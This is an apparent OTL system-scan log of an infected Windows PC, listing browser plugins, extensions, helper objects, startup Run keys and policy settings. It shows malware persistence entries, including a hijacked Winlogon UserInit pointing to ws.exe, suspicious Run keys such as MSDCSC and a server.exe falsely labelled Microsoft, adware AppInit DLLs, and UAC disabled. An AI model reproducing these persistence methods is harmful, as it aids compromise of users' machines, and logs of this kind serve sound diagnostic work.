FF - HKLM\Software\MozillaPlugins\@Google.com/GoogleEarthPlugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3508.1109: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3538.0513: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nexon.net/NxGame: C:\ProgramData\NexonUS\NGM\npNxGameUS.dll (Nexon)
FF - HKLM\Software\MozillaPlugins\@nullsoft.com/winampDetector;version=1: C:\Program Files (x86)\Winamp Detect\npwachk.dll (Nullsoft, Inc.)
FF - HKLM\Software\MozillaPlugins\@oberon-media.com/ONCAdapter:  File not found
FF - HKLM\Software\MozillaPlugins\@pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@soe.sony.com/installer,version=1.0.3: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\t1p05fwg.default\extensions\{000F1EA4-5E08-4564-A29B-29076F63A37A}\plugins\npsoe.dll File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\3\NP_wtapp.dll ()
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@nsroblox.roblox.com/launcher: C:\Program Files (x86)\Roblox\Versions\version-ca7bb36aabe54be5\\NPRobloxProxy.dll ()
FF - HKCU\Software\MozillaPlugins\@powerchallenge.com/PowerLoader: C:\Users\Owner\AppData\LocalLow\POWERC~1\nppowerloader.dll (Power Challenge Sweden AB)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Owner\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/GoogleTalkPlugin: C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/O1DPlugin: C:\Users\Owner\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Owner\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Owner\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@unity3d.com/UnityPlayer,version=1.0: C:\Users\Owner\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF - HKCU\Software\MozillaPlugins\anvisoft.com/AdblockPlugin: C:\ProgramData\Anvisoft\Anvi Smart Defender 2\extensions\npAdblockPlugin.dll (Anvisoft)
FF - HKCU\Software\MozillaPlugins\pandonetworks.com/PandoWebPlugin: C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll File not found
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{000a9d1c-beef-4f90-9363-039d445309b8}: C:\Program Files (x86)\Google\Google Gears\Firefox\ [2010/04/03 18:24:02 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\smartwebprinting@hp.com: C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010/04/13 18:41:37 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\coFFPlgn\ [2014/05/26 00:10:30 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\lesstabs@lesstabs.com: C:\Program Files (x86)\Mozilla Firefox\extensions\lesstabs@lesstabs.com
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{BBDA0591-3099-440a-AA10-41764D9DB4DB}: C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_20.1.0.24\IPSFF [2013/10/13 18:28:09 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{C7AE725D-FA5C-4027-BB4C-787EF9F8248A}: C:\Program Files (x86)\RelevantKnowledge\firefox
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2014/04/11 21:24:38 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 29.0.1\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/05/27 08:09:25 | 000,000,000 | ---D | M]
 
[2002/01/01 03:15:28 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Extensions
[2014/05/28 08:28:35 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions
[2014/04/27 17:57:51 | 000,000,000 | ---D | M] ("CloudShare plugin for Firefox") -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\itst-firefox-plugin@itstructures.com
[2014/04/19 22:05:58 | 000,000,000 | ---D | M] (tinymediaplayer Support) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\jid1-RYwhP9dQdGfXkQ@jetpack
[2014/05/27 08:08:04 | 000,000,000 | ---D | M] (SNT) -- C:\Users\Owner\AppData\Roaming\mozilla\Firefox\Profiles\47jsurhl.default-1385867679964\extensions\yieuo@fis-.org
[2014/05/15 20:06:35 | 000,371,488 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\client@anonymox.net.xpi
[2013/12/01 13:11:48 | 000,021,497 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\leethax@leethax.net.xpi
[2014/01/06 16:50:27 | 000,017,971 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\{c1970c0d-dbe6-4d91-804f-c9c0de643a57}.xpi
[2014/04/30 20:06:27 | 000,957,880 | ---- | M] () (No name found) -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2014/05/25 19:26:03 | 000,001,014 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\searchplugins\trovi-search.xml
[2014/05/25 19:26:03 | 000,007,855 | ---- | M] () -- C:\Users\Owner\AppData\Roaming\mozilla\firefox\profiles\47jsurhl.default-1385867679964\searchplugins\WebSearch.xml
[2013/05/24 15:05:58 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/04/11 17:48:38 | 000,000,000 | ---D | M] (Hotspot Shield Helper (Please allow this installation)) -- C:\Program Files (x86)\Mozilla Firefox\extensions\afurladvisor@anchorfree.com
[2014/05/03 14:36:57 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/05/10 13:10:26 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - plugin: Error reading preferences file
CHR - Extension: Entanglement Web App = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aciahcmjmecflokailenpkdchphgkefd\3.4.9_0\
CHR - Extension: Flicktion = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ahlonbncfpcjijmjkchpcbjbfanloaci\0.0.4_0\
CHR - Extension: Angry Birds = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aknpkdffaafgjchaibgeefbgmgeghloj\1.5.0.7_0\
CHR - Extension: save on = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\balakjmegnjmgocoiikmpocclkilbiil\2.14\
CHR - Extension: Kaboom = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\beahobhgpojnjfdjglaehfhdanaioode\1.5_0\
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\
CHR - Extension: Adblock Plus = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.8.1_0\
CHR - Extension: Pandora = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fbangkleohkafngihneedemihgfeikcl\1.0_0\
CHR - Extension: tinymediaplayer = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnnjbpfkbiophjcpjfhojffigapncemg\1.0_0\
CHR - Extension: Authy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gaedmjdfmmahhbjefcbgaolhhanlaolb\1.0.6_0\
CHR - Extension: Authy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gaedmjdfmmahhbjefcbgaolhhanlaolb\1.0.7_0\
CHR - Extension: Hola Better Internet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio\1.3.403_0\
CHR - Extension: Hola Better Internet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio\1.3.434_0\
CHR - Extension: YoutubeAdblocker = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\iicmcmnnjkkckalmfchmpcnommcckolc\1.0\
CHR - Extension: Little Alchemy = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\knkapnclbofjjgicpkfoagdjohlfjhpd\0.0.15.7_0\
CHR - Extension: AnviAdblock = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\lhmiofmipcpmhgihiecmpiekcacigpgb\1.0_0\
CHR - Extension: Poppit = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcbkbpnkkkipelfledbfocopglifcfmi\2.2_0\
CHR - Extension: Rain Alarm = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\meaikaglpfemjncbioflellmppndgmok\1.1.20_0\
CHR - Extension: christmas theme = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mnfcgdpeaofnjiipbmdafbjjfjpdceel\1.2_0\
CHR - Extension: ROBLOX Outfit Saver Extension = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpaohnjlgfabcooefhihmafmdcbliakf\1.6.0_0\
CHR - Extension: SNT = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\mphagcbbnchmmbdpneljbjolhkkgoeak\2.1\
CHR - Extension: PlayBryte = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\neipakemjlgaoklhkealjjannpkccloa\1.0_0\
CHR - Extension: SaVe on = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nfmolpfmkngcnbmoogplkkblmdkjolcm\2.14\
CHR - Extension: Google Wallet = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_1\
CHR - Extension: Google Quick Scroll = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\okanipcmceoeemlbjnmnbdibhgpbllgc\127\
CHR - Extension: YoutubeAdblocker = C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pfiagcconkapemepmladlcppnelbpngf\1.0\
 
O1 HOSTS File: ([2014/04/27 16:07:22 | 000,000,000 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (no name) - ##TOOLBAR_DISABLED_##{F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - No CLSID value found.
O2:64bit: - BHO: (sAve on) - {247C8BF4-6150-D2A7-EEA7-037A2265B307} - C:\Program Files (x86)\sAve on\ZQmJngjs4s.x64.dll ()
O2:64bit: - BHO: (YoutubeAdblocker) - {9344EB71-F5E0-A7D6-39BD-A44814EFFA4B} - C:\Program Files (x86)\YoutubeAdblocker\AyR5_S.x64.dll ()
O2:64bit: - BHO: (SNT) - {E289C34B-639B-FEBE-CF7B-47CE1B6284A5} - C:\Program Files (x86)\SNT\Xj.x64.dll ()
O2:64bit: - BHO: (DataMngr) - {F2D6C718-7E52-428E-8852-365C4B1A6E36} - C:\Program Files (x86)\Settings Alerter\Datamngr\x64\BrowserConnection.dll (Koyote-Lab, inc)
O2:64bit: - BHO: (no name) - {F9E4A054-E9B1-4BC3-83A3-76A1AE736170} - No CLSID value found.
O2 - BHO: (sAve on) - {247C8BF4-6150-D2A7-EEA7-037A2265B307} - C:\Program Files (x86)\sAve on\ZQmJngjs4s.dll ()
O2 - BHO: (Norton Identity Protection) - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\coIEPlg.dll File not found
O2 - BHO: (Norton Vulnerability Protection) - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\IPS\IPSBHO.DLL File not found
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (YoutubeAdblocker) - {9344EB71-F5E0-A7D6-39BD-A44814EFFA4B} - C:\Program Files (x86)\YoutubeAdblocker\AyR5_S.dll ()
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (SNT) - {E289C34B-639B-FEBE-CF7B-47CE1B6284A5} - C:\Program Files (x86)\SNT\Xj.dll ()
O2 - BHO: (DataMngr) - {F2D6C718-7E52-428E-8852-365C4B1A6E36} - C:\Program Files (x86)\Settings Alerter\Datamngr\BrowserConnection.dll (Koyote-Lab, inc)
O3:64bit: - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{47833539-D0C5-4125-9FA8-0819E2EAAC93} - No CLSID value found.
O3 - HKLM\..\Toolbar: (Contribute Toolbar) - ##TOOLBAR_DISABLED_##{517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files (x86)\/Adobe Contribute CS4/contributeieplugin.dll ()
O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - ##TOOLBAR_DISABLED_##{EF99BD32-C1FB-11D2-892F-0090271D4F88} - No CLSID value found.
O3 - HKLM\..\Toolbar: (Norton Toolbar) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\20.4.0.40\coIEPlg.dll File not found
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {1EED0937-BCCD-4F7B-96F7-EE6D485BAE2D} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {41534932-2D56-3600-76A7-7A786E7484D7} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (Adobe PDF) - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O4 - HKLM..\Run: []  File not found
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [HKLM] C:\Windows\SysWOW64\install\server.exe (Microsoft Corporation)
O4 - HKLM..\Run: [hpsysdrv] c:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe (Hewlett-Packard)
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe (Intel Corporation)
O4 - HKLM..\Run: [KiesTrayAgent] C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe (Samsung Electronics Co., Ltd.)
O4 - HKLM..\Run: [LogMeIn Hamachi Ui] C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe (LogMeIn Inc.)
O4 - HKLM..\Run: [PlusService] C:\Program Files (x86)\Yuna Software\Messenger Plus!\PlusService.exe (Yuna Software)
O4 - HKLM..\Run: [QHSafeTray] C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe ()
O4 - HKCU..\Run: [CloudSystemBooster] C:\Program Files (x86)\Anvisoft\Cloud System Booster\CloudSystemBooster.exe (Anvisoft)
O4 - HKCU..\Run: [Clownfish] C:\Program Files (x86)\Clownfish\Clownfish.exe (Bogdan Sharkov)
O4 - HKCU..\Run: [File] C:\Program Files (x86)\Java\jre7\bin\javaw.exe (Oracle Corporation)
O4 - HKCU..\Run: [GoogleChromeAutoLaunch_721577D41E77D440C916E2687EBA0267] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
O4 - HKCU..\Run: [LightShot] C:\Users\Owner\AppData\Local\Skillbrains\lightshot\Lightshot.exe ()
O4 - HKCU..\Run: [MSDCSC] C:\Program Files (x86)\Java\jre7\bin\javaw.exe (Oracle Corporation)
O4 - HKCU..\Run: [SmileboxTray] C:\Users\Owner\AppData\Roaming\Smilebox\SmileboxTray.exe (Smilebox, Inc.)
O4 - HKCU..\Run: [Steam] C:\Program Files (x86)\Steam\steam.exe (Valve Corporation)
O4 - HKCU..\Run: [uTorrent] C:\Users\Owner\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.)
O4 - HKCU..\Run: [Windows applicaton] C:\Users\Owner\AppData\Roaming\File Name.exe (ghaMJsw)
O4 - HKCU..\Run: [WindowsSystem] C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Activities present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: SoftwareSASGeneration = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLinkedConnections = 1
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktopCleanupWizard = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDesktop = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: LogonHoursAction = 2
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DontDisplayLogonHoursWarnings = 1
O8:64bit: - Extra context menu item: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8:64bit: - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm File not found
O8:64bit: - Extra context menu item: Translate with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm File not found
O8 - Extra context menu item: Append Link Target to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Append to Existing PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Convert Link Target to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Convert to Adobe PDF - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
O8 - Extra context menu item: Translate this web page with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/ActionTU.htm File not found
O8 - Extra context menu item: Translate with Babylon - res://C:\Program Files (x86)\Babylon\Babylon-Pro\Utils\BabylonIEPI.dll/Action.htm File not found
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000009 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000009 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O16:64bit: - DPF: {140E4DF8-9E14-4A34-9577-C77561ED7883} http://content.syste...ri_4.1.71.0.cab (Reg Error: Key error.)
O16 - DPF: {149E45D8-163E-4189-86FC-45022AB2B6C9} file:///C:/Program%20Files%20(x86)/Bejeweled%203/Images/stg_drm.ocx (SpinTop DRM Control)
O16 - DPF: {6A060448-60F9-11D5-A6CD-0002B31F7455}  (ExentInf Class)
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset...lineScanner.cab (Reg Error: Key error.)
O16 - DPF: {80B626D6-BC34-4BCF-B5A1-7149E4FD9CFA} http://zone.msn.com/...O1.cab60096.cab (UnoCtrl Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.55.2)
O16 - DPF: {924B4927-D3BA-41EA-9F7E-8A89194AB3AC} http://panda-plugin..../p3dactivex.cab (P3DActiveX Control)
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} http://cdn2.zone.msn...k.cab102118.cab (MSN Games - Installer)
O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_31)
O16 - DPF: {CAFEEFAC-0017-0000-0009-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_09)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.55.2)
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab (Reg Error: Key error.)
O16 - DPF: {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} http://utilities.pcp.../pcpitstop2.dll (PCPitstop Exam)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{CF96632F-9E52-4C44-9872-C8C04B9D8AD8}: DhcpNameServer = 192.168.1.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (Client Connect LTD)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~3\Wincert\WIN64C~1.DLL) -  File not found
O20:64bit: - AppInit_DLLs: (C:\PROGRA~2\SO_X64~1.BO~) - C:\Program Files (x86)\SO_x64.Booster ()
O20 - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (Client Connect LTD)
O20 - AppInit_DLLs: (c:\progra~2\settin~1\datamngr\iebho.dll) - c:\Program Files (x86)\Settings Alerter\Datamngr\IEBHO.dll (Koyote-Lab, inc)
O20 - AppInit_DLLs: (c:\progra~2\so0cb7~1.bo~) - c:\Program Files (x86)\SO.Booster ()
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Users\Owner\Documents\WindSys\ws.exe) - C:\Users\Owner\Documents\WindSys\ws.exe (Microsoft Corp.)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Users\Owner\AppData\Roaming\Microsoft\csrss.exe) -  File not found
